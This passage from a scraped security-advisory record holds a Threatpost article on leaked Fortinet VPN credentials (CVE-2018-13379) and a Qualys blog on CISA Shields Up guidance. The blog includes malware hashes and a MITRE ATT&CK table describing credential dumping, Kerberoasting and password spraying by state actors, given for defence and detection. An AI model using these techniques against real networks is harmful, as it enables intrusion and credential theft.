2020](<https://urldefense.proofpoint.com/v2/url?u=https-3A__www.fortinet.com_blog_business-2Dand-2Dtechnology_atp-2D29-2Dtargets-2Dssl-2Dvpn-2Dflaws&d=DwMGaQ&c=tEbGsWWjqkBSpaWdXc_mdMSanI1bDu-FKXiKGCfVmPM&r=ci047yKZbNETIRLbYhPR9hvS9MgdS6HahLetj-MiY5k&m=S-tLJEaNHed7zOH8JaLd3mVoBNXqYMeUqJMrJaXLE9s&s=F9W4tauf4zFHFuZbvTYHmF2Y2b_tHI0htVTpiF6kRwM&e=>), [April 2021](<https://urldefense.proofpoint.com/v2/url?u=https-3A__www.fortinet.com_blog_psirt-2Dblogs_patch-2Dvulnerability-2Dmanagement&d=DwMGaQ&c=tEbGsWWjqkBSpaWdXc_mdMSanI1bDu-FKXiKGCfVmPM&r=ci047yKZbNETIRLbYhPR9hvS9MgdS6HahLetj-MiY5k&m=S-tLJEaNHed7zOH8JaLd3mVoBNXqYMeUqJMrJaXLE9s&s=m_k7PDQ0L4L0_OvdKQgGF5LkRVde6Q9EjgVXWtyg7sY&e=>) and [June 2021](<https://www.fortinet.com/blog/psirt-blogs/prioritizing-patching-is-essential-for-network-integrity>) For more information, please refer to our latest [blog](<https://www.fortinet.com/blog/psirt-blogs/malicious-actor-discloses-fortigate-ssl-vpn-credentials>) and [PSIRT](<https://www.fortiguard.com/psirt/FG-IR-18-384>) advisory. We strongly urge customers to implement both the patch upgrade and password reset as soon as possible.\u201d\n\n## A Creaky Old Bug Was Exploited\n\nOn Wednesday, the company confirmed that the attackers exploited [FG-IR-18-384](<https://www.fortiguard.com/psirt/FG-IR-18-384>) / [CVE-2018-13379](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>): a path traversal weakness in Fortinet\u2019s FortiOS that was discovered in 2018 and which has been [repeatedly](<https://threatpost.com/election-systems-attack-microsoft-zerologon/160021/>), [persistently](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) [exploited](<https://threatpost.com/hackers-exploit-flaw-cring-ransomware/165300/>) [since](<https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/>) then.\n\nUsing the leaked VPN credentials, attackers can perform data exfiltration, install malware and launch ransomware attacks.\n\nThe bug, which recently made it to the Cybersecurity and Infrastructure Security Agency\u2019s (CISA\u2019s) list of the [top 30 most-exploited flaws](<https://threatpost.com/cisa-top-bugs-old-enough-to-buy-beer/168247/>), lets an unauthenticated attacker use specially crafted HTTP resource requests in order to download system files under the SSL VPN web portal.\n\n[Fortinet fixed the glitch](<https://www.fortiguard.com/psirt/FG-IR-18-384>) in a May 2019 update (and has since then repeatedly urged customers to upgrade their devices to FortiOS 5.4.13, 5.6.14, 6.0.11, or 6.2.8 and above). But even if security teams patched their VPNs, if they didn\u2019t also reset the devices\u2019 passwords at the same time, the VPNs still might be vulnerable.\n\n## All in the Babuk Family\n\nAccording to BleepingComputer, a threat actor known as Orange \u2013 the administrator of the newly launched RAMP hacking forum and a previous operator of the Babuk ransomware operation \u2013 was behind the leak of Fortinet credentials.\n\nOrange, who reportedly split off from Babuk after gang members quarreled, is believed to now be in with the new Groove ransomware operation. On Tuesday, Orange created a post on the RAMP forum with a link to a file that allegedly contained thousands of Fortinet VPN accounts.\n\nAt the same time, a post promoting the Fortinet leak appeared on Groove\u2019s data leak site.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/09181910/Screen-Shot-2021-09-09-at-6.18.51-PM-e1631225999483.png>)\n\nGroove is a new ransomware gang that\u2019s been active just since last month. It favors the [double extortion](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>) model of combining data compromise with threats to publish seized data.\n\nAccording to a Wednesday[ post](<https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates>) co-authored by researchers from Intel471 and McAfee Enterprise Advanced Threat Research (ATR), with contributions from Coveware, McAfee Enterprise ATR said that it believes with high confidence that Groove is associated with the Babuk gang, either as a former affiliate or subgroup.\n\n## Chatting Up the Ransomware \u2018Artist\u2019\n\nOn Tuesday, one of the Groove gang\u2019s members decided to chat up [Advanced Intel researchers](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATURfcd4v3FHxX6gbihrPKiOsKVZWKogo5F6F12wmaozsXKHpRn-2BuwOKhxsw08i8Jv-2FwvO5fMxaC-2Fte96Z6WZovyPDvgaoAv118tKwZ5rO8iwUDyyIWPDHnMoXBJtaLTD2RabFZrrydZEg6RqJoehkdLk-3DUm1f_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzQ9CpkZyf7pccI4YxuRF0BJuYEbml5ScFK0-2F-2FZqd-2FdTfxpBYaCF7SSTgcHUKKV76UPqxTA0p35WcvHO-2B-2FRJuzuH54khmPYQLlkSfPjUHNAEXmgG-2BAfkNgcNKoVR9B9stOpafLCBk3qkXifeCsD9qirBA0nFvpW7EKJZBqmyDuRJPZiat-2B-2BXYCIJyRqjlbli1cMzNiEtsWjfRjsB82fJ-2BuXkMJGLitr0yTHVhHoV-2B7vgARde73QCuABoV-2Fk8lDDaGpEQVoKiwlCAiZTq63zy5kUQ-3D>), to give them an insider\u2019s take on how the new ransomware syndicate was formed and how it recruits operators. That included \u201cthe \u2018truth\u2019 about the association of Babuk, [DarkSide](<https://threatpost.com/darksides-servers-shutdown/166187/>) and [BlackMatter](<https://threatpost.com/ransomware-gangs-haron-blackmatter/168212/>), and other insights on the inner relationships within the ransomware community,\u201d as researchers Yelisey Boguslavskiy and Anastasia Sentsova explained.\n\nAccording to their writeup, the Groove representative is likely a threat actor that goes by \u201cSongBird\u201d. The researchers described SongBird as a known character, being a former Babuk ransomware operator and creator of the RAMP forum \u2013 which was launched on July 11 and which caters to top ransomware operators plotting their attacks.\n\nThe screen capture below shows Advanced Intel\u2019s translation of SongBird\u2019s explanation of the platform: \u201cRAMP is the result of my year-long work of manipulation by top journalists and media such as Bloomberg and others. I spent quite some time to promote this domain and I am very proud for all of the work I did! I declare this forum is a work of art!\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/09183430/kitten-brag-e1631226887669.jpg>)\n\nAccording to Advanced Intel, RAMP was initially based on the former Babuk\u2019s data leak website domain but has since relocated to a new domain.\n\nSongBird was reportedly prompted to pull off their tell-all after the [disclosure of Babuk\u2019s source code](<https://threatpost.com/babuk-ransomware-builder-virustotal/167481/>). The source code was uploaded to VirusTotal in July, making it available to all security vendors and competitors. At the time, it wasn\u2019t clear how it happened, though Advanced Intel said on Wednesday that the code release was done by an actor using the alias DY-2.\n\nThe code release had repercussions, Advanced Intel said. \u201cThe incident caused a massive backlash from the underground community which once again provoked the release of the blog by SongBird,\u201d according to the report.\n\nSongBird told the researchers that the actor wanted to address \u201cthe issue of constant misinformation and misreporting originating from the Twitter community covering the ransomware subject.\u201d\n\nThe actor denied any associations between DarkSide and BlackMatter, with the exception of both ransomware strains sharing the same source code: a circumstance that means the code \u201cmost likely has been purchased from one of the DarkSide affiliates,\u201d SongBird wrote.\n\n## How to Protect Your VPN\n\nYou can check Fortinet\u2019s advisory for a list of versions affected by the oft-exploited vulnerability that was at the heart of this credential scraping. Fortinet had the following recommendations for organizations that may have been running an affected version \u201cat any time\u201d:\n\n 1. Disable all VPNs (SSL-VPN or IPSEC) until the following remediation steps have been taken.\n 2. Immediately upgrade affected devices to the latest available release, as detailed below.\n 3. Treat all credentials as potentially compromised by performing an organization-wide password reset.\n 4. Implement multi-factor authentication, which will help mitigate the abuse of any compromised credentials, both now and in the future.\n 5. Notify users to explain the reason for the password reset and monitor services such as HIBP for your domain. There is the potential that if passwords have been reused for other accounts, they could be used in credential stuffing attacks.\n\nRajiv Pimplaskar, Veridium chief revenue officer, told Threatpost that the breach is \u201ca stark reminder of today\u2019s dangers with password-based systems. While enterprises and users are starting to adopt passwordless authentication methods like \u2018phone as a token\u2019 and FIDO2 for customer and Single Sign On (SSO) portals and enterprise applications, vulnerabilities still exist across entire categories of cases such as, 3rd party sites, VPN (Virtual Private Network) and VDI (Virtual Desktop Infrastructure) environments, all of which are particularly vulnerable in the current WFH explosion.\n\n\u201cCompanies need to adopt a more holistic modern authentication strategy that is identity provider agnostic and can operate across all use cases in order to build true resiliency and ensure cyber defense against such actors,\u201d he concluded.\n\n**It\u2019s time to evolve threat hunting into a pursuit of adversaries. **[**JOIN**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** Threatpost and Cybersixgill for **[**Threat Hunting to Catch Adversaries, Not Just Stop Attacks**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** and get a guided tour of the dark web and learn how to track threat actors before their next attack. **[**REGISTER NOW**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** for the LIVE discussion on September 22 at 2 PM EST with Cybersixgill\u2019s Sumukh Tendulkar and Edan Cohen, along with researcher and vCISO Chris Roberts and Threatpost host Becky Bracken.**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T22:49:27", "type": "threatpost", "title": "Thousands of Fortinet VPN Account Credentials Leaked", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-09-09T22:49:27", "id": "THREATPOST:8A56F3FFA956FB0BB2BB4CE451C3532C", "href": "https://threatpost.com/thousands-of-fortinet-vpn-account-credentials-leaked/169348/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "qualysblog": [{"lastseen": "2022-03-04T01:27:17", "description": "**_CISA has created Shields Up as a response to the Russian invasion of Ukraine. Qualys is responding with additional security, monitoring and governance measures. This blog details how and what our enterprise customers can do to immediately strengthen their security posture and meet CISA\u2019s recommendations._**\n\nWith the invasion of Ukraine by Russia, the U.S. Cybersecurity & Infrastructure Security Agency (CISA) has created a [program titled Shields Up](<https://www.cisa.gov/shields-up>) and provided specific guidance to all organizations. The Russian government has used cyber operations as a key component of force projection in the past and has targeted critical infrastructure to destabilize a governments\u2019 response capabilities. Critical infrastructure can include supply chain (including software supply chain), power, utilities, communications, transportation, and government and military organizations.\n\n### Protecting Customer Data on Qualys Cloud Platform****\n\nQualys is strongly committed to the security of our customers and their data. In addition to proactive risk mitigation with continuous patch and configuration management, we continually monitor all our environments for any indication of active threats, exploits and compromises. We hold our platforms to the highest security and compliance mandates like [FedRAMP](<https://blog.qualys.com/product-tech/2022/02/24/meet-fedramp-compliance-with-qualys-cloud-platform>). However, given the heightened risk environment around the globe, the Qualys Security and Engineering teams have been at a heightened state of vigilance in recent weeks. We continuously monitor our internal systems in this amplified threat environment. We are working with our security partners to access the latest threat intel. We have implemented additional security, monitoring, and governance measures involving our senior leadership and are committed to ensuring that the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>) remains available and secure to support the enterprises we serve worldwide.\n\n### Urgent: Assess and Heighten Your Security Posture\n\nBased on high-level guidelines provided by CISA, Qualys is recommending all organizations to establish the following actionable steps to adopt heightened cybersecurity posture to protect critical assets.\n\nThere are 4 steps necessary to strengthen security posture per CISA\u2019s Shields Up guidance: \n\n\n * Step 1: Know Your Shodan/Internet Exposed Assets Automatically\n * Step 2: Detect, Prioritize, and Remediate CISA's Catalog of Known Exploited Vulnerabilities\n * Step 3: Protect Your Cloud Services and Office 365 Environment\n * Step 4: Continuously Detect a Potential Intrusion\n\n* * *\n\n****Implement CISA\u2019s Shields Up Guidance****\n\n[Try it Now](<https://www.qualys.com/forms/cisa-shields-up-service/>)\n\n* * *\n\n### Step 1: Monitor Your Shodan/Internet Exposed Assets \n\n\n#### Discover and protect your external facing assets \n\n\nAn organization\u2019s internet-facing systems represent much of their potential attack surface. Cyber threat actors are continuously scanning the internet for vulnerable systems to target attacks and campaigns. Often hackers find this information readily available on the dark web or in plain sight on internet search engines such as Shodan.io.\n\nInventory all your assets and monitor your external attack surface. [Qualys CyberSecurity Asset Management (CSAM)](<https://www.qualys.com/apps/cybersecurity-asset-management/>) provides comprehensive visibility of your external-facing IT infrastructure by natively correlating asset telemetry collected by Qualys sensors (e.g. Internet Scanners, Cloud Agents, Network Passive Sensors) and key built-in integrations such as [Shodan.io](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/20/qualys-integrates-with-shodan-to-help-map-the-external-attack-surface>) and Public Cloud Providers.\n\nOne of the biggest risks is unknown unknowns. These gaps in visibility happen for many reasons \u2013 including shadow IT, forgotten websites, legacy services, mergers & acquisitions (M&A), or simply because a development team exposes an application or database without informing their security team.\n\nCSAM enables you to continuously discover these blind spots and assess their security and compliance posture.\n\n\n\n#### Monitor Industrial Control Systems and Operational Technology\n\nNetwork segmentation traditionally kept Industrial Control Systems air-gapped. However, the acceleration of digital transformation has enabled more of these systems to connect with corporate as well as external networks, such as device vendors and Industrial IoT platforms. Further, the majority of Operational Technology utilizes legacy, non-secure protocols.\n\nBuild full visibility of your critical infrastructure, network communications, and vulnerabilities with Qualys Industrial Control Security (ICS).\n\n\n\n#### Detect and disable all non-essential ports and protocols, especially on internet exposed assets\n\nInventory your internal and external-facing assets, report open ports, and detected services on each port. Qualys CSAM supports extensive query language that enables teams to report and act on detected external facing assets that have a remote-control service running (for example Windows Remote Desktop). \n\n\n\n#### Ensure all systems are protected with up-to-date antivirus/anti-malware software****\n\nFlag assets within your inventory that are missing antivirus, or with signatures that are not up to date. CSAM allows you to define Software Rules and assign required software on a specific scope of assets or environment. For example, all database servers should have antivirus and a data loss prevention agent.\n\n\n\nVerify that your antivirus/anti-malware engine is up to date with the latest signatures.\n\n\n\nFor devices missing antivirus or anti-malware, [Qualys Multi-Vector EDR](<https://www.qualys.com/apps/endpoint-detection-response/>) with Integrated Anti-Malware can be easily enabled wherever the Qualys Cloud Agent is installed to provide immediate threat protection. In addition to basic anti-malware protection, Multi-Vector EDR will monitor endpoint activity to identify suspicious and malicious activity that usually bypasses traditional antivirus such as Living-off-the-Land attacks as well as MITRE ATT&CK tactics and techniques.\n\n### Step 2: Detect, Prioritize and Remediate CISA's Catalog of Known Exploited Vulnerabilities\n\nQualys Researcher analyzed all the 300+ CVEs from CISA known exploited vulnerabilities and mapped them to the Qualys QIDs. Many of these CVEs have patches available for the past several years. A new \u201cCISA Exploited\u201d RTI was added to VMDR to help customers create vulnerabilities reports that are focused on CISA exploited vulnerabilities. Customers can use the VMDR vulnerabilities page or VMDR prioritization page and filter the results to focus on all the \u201cCISA Exploited\u201d open vulnerabilities in their environment. \n\nFollowing are some of the critical vulnerabilities cataloged by CISA, as specifically known to be exploited by Russian state-sponsored APT actors for initial access include:\n\n**CVE**| **QID**| **Title**| **Release Date**| **CVSS_V3** \n---|---|---|---|--- \nCVE-2018-13379| 43702| Fortinet Fortigate (FortiOS) System File Leak through Secure Sockets Layer (SSL) Virtual Private Network (VPN) via Specially Crafted Hypertext Transfer Protocol (HTTP) Resource Requests (FG-IR-18-384)| 9/12/2019| 9.8 \nCVE-2019-2725| 87386| Oracle WebLogic Server Remote Code Execution Vulnerability (Oracle Security Alert Advisory - CVE-2019-2725)| 4/27/2019| 9.8 \nCVE-2019-7609| 371687| Kibana Multiple Security Vulnerabilities (ESA-2019-01,ESA-2019-02,ESA-2019-03)| 4/18/2019| 10 \nCVE-2019-10149| 50092| Exim Remote Command Execution Vulnerability| 6/5/2019| 9.8 \nCVE-2019-11510| 38771| Pulse Connect Secure Multiple Security Vulnerabilities (SA44101)| 8/6/2019| 10 \nCVE-2019-19781| 372305| Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability(CTX267027)| 12/23/2019| 9.8 \nCVE-2020-0688| 50098| Microsoft Exchange Server Security Update for February 2020| 2/12/2020| 9.8 \nCVE-2020-4006| 13215| VMware Workspace One Access Command Injection Vulnerability (VMSA-2020-0027)| 12/7/2020| 9.1 \nCVE-2020-5902| 38791| F5 BIG-IP ASM,LTM,APM TMUI Remote Code Execution Vulnerability (K52145254) (unauthenticated check)| 7/5/2020| 9.8 \nCVE-2020-14882| 87431| Oracle WebLogic Server Multiple Vulnerabilities (CPUOCT2020)| 10/21/2020| 9.8 \nCVE-2021-26855, CVE-2021- 26857 CVE-2021-26858, CVE-2021-27065 | 50107| Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon)| 3/3/2021| 9.8 \n \nSee the full list of [CISA known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n#### Remediate CISA recommended catalog of exploited vulnerabilities \n\nFor all CISA cataloged vulnerabilities known to be exploited by Russian state-sponsored actors, [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) customers can create a patch and configuration fix jobs to remediate the risk of all vulnerabilities directly from the VMDR console. Qualys Patch Management maps \u201cCISA Exploited\u201d vulnerabilities detected in the environment to the relevant patches required to remediate those vulnerabilities by downloading the patches without needing to go through the VPN. Customers may use Zero Touch patching to automate the process and ensure all CISA exploited vulnerabilities are automatically fixed including the new vulnerabilities added to the CISA catalog in the future. \n\n\n\n#### Monitor and ensure your software are always up to date\n\nImmediately know all end-of-support critical components across your environment, including open-source software. Qualys CSAM tracks lifecycle stages and corresponding support status, to help organizations manage their technical debt and to reduce the risk of not receiving security patches from the vendor. Security and IT teams can work together to plan upgrades ahead of time by knowing upcoming end-of-life & end-of-support dates.\n\n\n\nUse the \u201cPrioritize Report\u201d function in Qualys Patch Management to map software in your environment to the security risk opposed. Prioritize your remediation efforts based on software that introduces the most risk. Use this report to create automated patch jobs to ensure that the riskiest software is always up to date. Alternatively, deploy individual patches for the riskiest software. \n\n\n\n### Step 3: Protect Your Cloud Services and Office 365\n\nAs noted by CISA, misconfiguration of cloud services and SaaS applications like Office 365 are the primary attack vector for breaches.\n\n#### Detect and Remediate Public Cloud Infrastructure Misconfigurations****\n\nProtect your public cloud infrastructure by securing the following services on priority:\n\n * **IAM**: Ensure all users are MFA enabled and rotate all access keys older than 30 days. Verify that all service accounts are valid (i.e. in use) and have the minimum privilege.\n * **Audit Logs**: Turn on access logging for all cloud management events and for critical services (e.g. S3, RDS, etc.)\n * **Public-facing assets**: Validate that the firewall rules for public-facing assets allow only the needed ports. Pay special attention to RDP access. Place any system with an open RDP port behind a firewall and require users to use a VPN to access it through the firewall.\n\n Automatically detect and remediate cloud misconfigurations using [Qualys CloudView](<https://www.qualys.com/apps/cloud-security-assessment/>).\n\n\n\n#### Protect your Office 365 and Other SaaS Services****\n\nEnforce multi-factor authentication on all accounts with access to Office 365 tenants. At a minimum, enable MFA for accounts with different admin access rights to the tenant. [Qualys SaaSDR](<https://www.qualys.com/apps/saas-detection-response/>) lists all such accounts on which MFA is disabled. Further, Qualys SaaSDR enables continuous security posture assessment of Office 365 via the CIS (Center for Internet Security) certified policy for Office, along with automated security configuration assessment for Zoom, Salesforce, and Google Workspace. This is based on an analysis of all security weaknesses, critical vulnerabilities, and exploits leveraged by attackers in historical attacks as well as security assessments based on the MITRE ATT&CK framework.\n\n\n\n### Step 4: Continuously Detect any Potential Threats and Attacks \n\nMonitor for increases in suspicious and malicious activities as well as anomalous behavior on all endpoints. With Qualys Multi-Vector EDR, customers can detect Indicators of Compromise (IOC) and MITRE ATT&CK Tactics & Techniques provided by CISA and respond quickly to mitigate the risk by capturing process, file, and network events on the endpoint and correlating them with the latest Threat Intelligence, including new and upcoming Indicators of Compromise (IOC) constantly added by the Qualys Research Team. Anomalous endpoint behavior is detected and identified as MITRE ATT&CK Tactics and Techniques.\n\n\n\nThe Appendix at the bottom of this post contains a list of Indicators of Compromise (IOC) and MITRE ATT&CK Tactics & Techniques being utilized.\n\n## Take Action to Learn More about How to Strengthen Your Defenses\n\nWe encourage you to learn more about how to strengthen your defenses consistent with CISA Shields Up guidelines using Qualys Cloud Platform. Join our webinar, [How to Meet CISA Shields Up Guidelines for Cyberattack Protection](<https://event.on24.com/wcc/r/3684128/0F6FB4010D39461FD4209A3E4EB8E9CD>), on March 3, 2022.\n\nQualys recommends that all organizations, regardless of size, heighten their security posture based on the above actionable steps, to protect critical cyber infrastructure from potential state-sponsored, advanced cyberattacks. Qualys Cloud Platform remains continuously committed to high standards of security and compliance to safeguard customer data. In this amplified threat environment, the entire Qualys team is available to help our customers improve cybersecurity and resilience.\n\n* * *\n\n****Implement CISA\u2019s Shields Up Guidance****\n\n[Try it Now](<https://www.qualys.com/forms/cisa-shields-up-service/>)\n\n* * *\n\n### **Appendix:**\n\n#### CISA catalog of known exploited vulnerabilities by state attackers\n\n**CVE**| **QID**| **Title**| **Release Date**| **CVSS_V3** \n---|---|---|---|--- \nCVE-2018-13379| 43702| Fortinet Fortigate (FortiOS) System File Leak through Secure Sockets Layer (SSL) Virtual Private Network (VPN) via Specially Crafted Hypertext Transfer Protocol (HTTP) Resource Requests (FG-IR-18-384)| 9/12/2019| 9.8 \nCVE-2019-1653| 13405| Cisco Small Business RV320 and RV325 Router Multiple Security Vulnerabilities| 1/29/2019| 7.5 \nCVE-2019-2725| 87386| Oracle WebLogic Server Remote Code Execution Vulnerability (Oracle Security Alert Advisory - CVE-2019-2725)| 4/27/2019| 9.8 \nCVE-2019-7609| 371687| Kibana Multiple Security Vulnerabilities (ESA-2019-01,ESA-2019-02,ESA-2019-03)| 4/18/2019| 10 \nCVE-2019-9670| 375990| Zimbra XML External Entity Injection (XXE) Vulnerability| 8/12/2021| 9.8 \nCVE-2019-10149| 50092| Exim Remote Command Execution Vulnerability| 6/5/2019| 9.8 \nCVE-2019-11510| 38771| Pulse Connect Secure Multiple Security Vulnerabilities (SA44101)| 8/6/2019| 10 \nCVE-2019-19781| 372305| Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability(CTX267027)| 12/23/2019| 9.8 \nCVE-2020-0688| 50098| Microsoft Exchange Server Security Update for February 2020| 2/12/2020| 9.8 \nCVE-2020-4006| 13215| VMware Workspace One Access Command Injection Vulnerability (VMSA-2020-0027)| 12/7/2020| 9.1 \nCVE-2020-5902| 38791| F5 BIG-IP ASM,LTM,APM TMUI Remote Code Execution Vulnerability (K52145254) (unauthenticated check)| 7/5/2020| 9.8 \nCVE-2020-14882| 87431| Oracle WebLogic Server Multiple Vulnerabilities (CPUOCT2020)| 10/21/2020| 9.8 \nCVE-2021-26855, CVE-2021- 26857 CVE-2021-26858, CVE-2021-27065 | 50107| Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon)| 3/3/2021| 9.8 \n \nSee the full list of [CISA known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n#### List of IOCs related to Hermetic Wiper aka KillDisk\n\n**SHA256 Hashes** \n--- \n0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da \n06086c1da4590dcc7f1e10a6be3431e1166286a9e7761f2de9de79d7fda9c397 \n095c7fa99dbc1ed7a3422a52cc61044ae4a25f7f5e998cc53de623f49da5da43 \n0db5e5b68dc4b8089197de9c1e345056f45c006b7b487f7d8d57b49ae385bad0 \n1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591 \n2c10b2ec0b995b88c27d141d6f7b14d6b8177c52818687e4ff8e6ecf53adf5bf \n34ca75a8c190f20b8a7596afeb255f2228cb2467bd210b2637965b61ac7ea907 \n3c557727953a8f6b4788984464fb77741b821991acbf5e746aebdd02615b1767 \n4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382 \n7e154d5be14560b8b2c16969effdb8417559758711b05615513d1c84e56be076 \n923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6 \n9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d \na196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92 \nb01e0c6ac0b8bcde145ab7b68cf246deea9402fa7ea3aede7105f7051fe240c1 \nb60c0c04badc8c5defab653c581d57505b3455817b57ee70af74311fa0b65e22 \nb6f2e008967c5527337448d768f2332d14b92de22a1279fd4d91000bb3d4a0fd \nc2d06ad0211c24f36978fe34d25b0018ffc0f22b0c74fd1f915c608bf2cfad15 \nd4e97a18be820a1a3af639c9bca21c5f85a3f49a37275b37fd012faeffcb7c4a \ndcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78 \ne5f3ef69a534260e899a36cec459440dc572388defd8f1d98760d31c700f42d5 \nf50ee030224bf617ba71d88422c25d7e489571bc1aba9e65dc122a45122c9321 \nfd7eacc2f87aceac865b0aa97a50503d44b799f27737e009f91f3c281233c17d \n \n#### List of MITRE ATT&CK TIDs provided by CISA\n\n**Tactic**| **Technique******| **Procedure****** \n---|---|--- \nReconnaissance [[TA0043](<https://attack.mitre.org/versions/v10/tactics/TA0043/>)]| Active Scanning: Vulnerability Scanning [[T1595.002](<https://attack.mitre.org/versions/v10/techniques/T1595/002/>)]| \nRussian state-sponsored APT actors have performed large-scale scans in an attempt to find vulnerable servers. \nPhishing for Information [[T1598](<https://attack.mitre.org/versions/v10/techniques/T1598>)]| Russian state-sponsored APT actors have conducted spearphishing campaigns to gain credentials of target networks. \nResource Development [[TA0042]](<https://attack.mitre.org/versions/v10/tactics/TA0042/>)| Develop Capabilities: Malware [[T1587.001](<https://attack.mitre.org/versions/v10/techniques/T1587/001>)]| Russian state-sponsored APT actors have developed and deployed malware, including ICS-focused destructive malware. \nInitial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]| Exploit Public Facing Applications [[T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)]| Russian state-sponsored APT actors use publicly known vulnerabilities, as well as zero-days, in internet-facing systems to gain access to networks. \nSupply Chain Compromise: Compromise Software Supply Chain [[T1195.002](<https://attack.mitre.org/versions/v10/techniques/T1195/002>)]| Russian state-sponsored APT actors have gained initial access to victim organizations by compromising trusted third-party software. Notable incidents include M.E.Doc accounting software and SolarWinds Orion. \nExecution [[TA0002](<https://attack.mitre.org/versions/v10/tactics/TA0002>)]| Command and Scripting Interpreter: PowerShell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)] and Windows Command Shell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)]| Russian state-sponsored APT actors have used `cmd.exe` to execute commands on remote machines. They have also used PowerShell to create new tasks on remote machines, identify configuration settings, exfiltrate data, and to execute other commands. \nPersistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003>)]| Valid Accounts [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>)]| Russian state-sponsored APT actors have used credentials of existing accounts to maintain persistent, long-term access to compromised networks. \nCredential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006>)]| Brute Force: Password Guessing [[T1110.001](<https://attack.mitre.org/versions/v10/techniques/T1110/001>)] and Password Spraying [[T1110.003](<https://attack.mitre.org/versions/v10/techniques/T1110/003>)]| Russian state-sponsored APT actors have conducted brute-force password guessing and password spraying campaigns. \nOS Credential Dumping: NTDS [[T1003.003](<https://attack.mitre.org/versions/v10/techniques/T1003/003/>)]| Russian state-sponsored APT actors have exfiltrated credentials and exported copies of the Active Directory database `ntds.dit`. \nSteal or Forge Kerberos Tickets: Kerberoasting [[T1558.003](<https://attack.mitre.org/versions/v10/techniques/T1558/003/>)]| Russian state-sponsored APT actors have performed \u201cKerberoasting,\u201d whereby they obtained the Ticket Granting Service (TGS) Tickets for Active Directory Service Principal Names (SPN) for offline cracking. \nCredentials from Password Stores [[T1555](<https://attack.mitre.org/versions/v10/techniques/T1555>)]| Russian state-sponsored APT actors have used previously compromised account credentials to attempt to access Group Managed Service Account (gMSA) passwords. \nExploitation for Credential Access [[T1212](<https://attack.mitre.org/versions/v10/techniques/T1212>)]| Russian state-sponsored APT actors have exploited Windows Netlogon vulnerability [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) to obtain access to Windows Active Directory servers. \nUnsecured Credentials: Private Keys [[T1552.004](<https://attack.mitre.org/versions/v10/techniques/T1552/004>)]| Russian state-sponsored APT actors have obtained private encryption keys from the Active Directory Federation Services (ADFS) container to decrypt corresponding SAML signing certificates. \nCommand and Control [[TA0011](<https://attack.mitre.org/versions/v10/tactics/TA0011/>)]| Proxy: Multi-hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v10/techniques/T1090/003/>)]| Russian state-sponsored APT actors have used virtual private servers (VPSs) to route traffic to targets. The actors often use VPSs with IP addresses in the home country of the 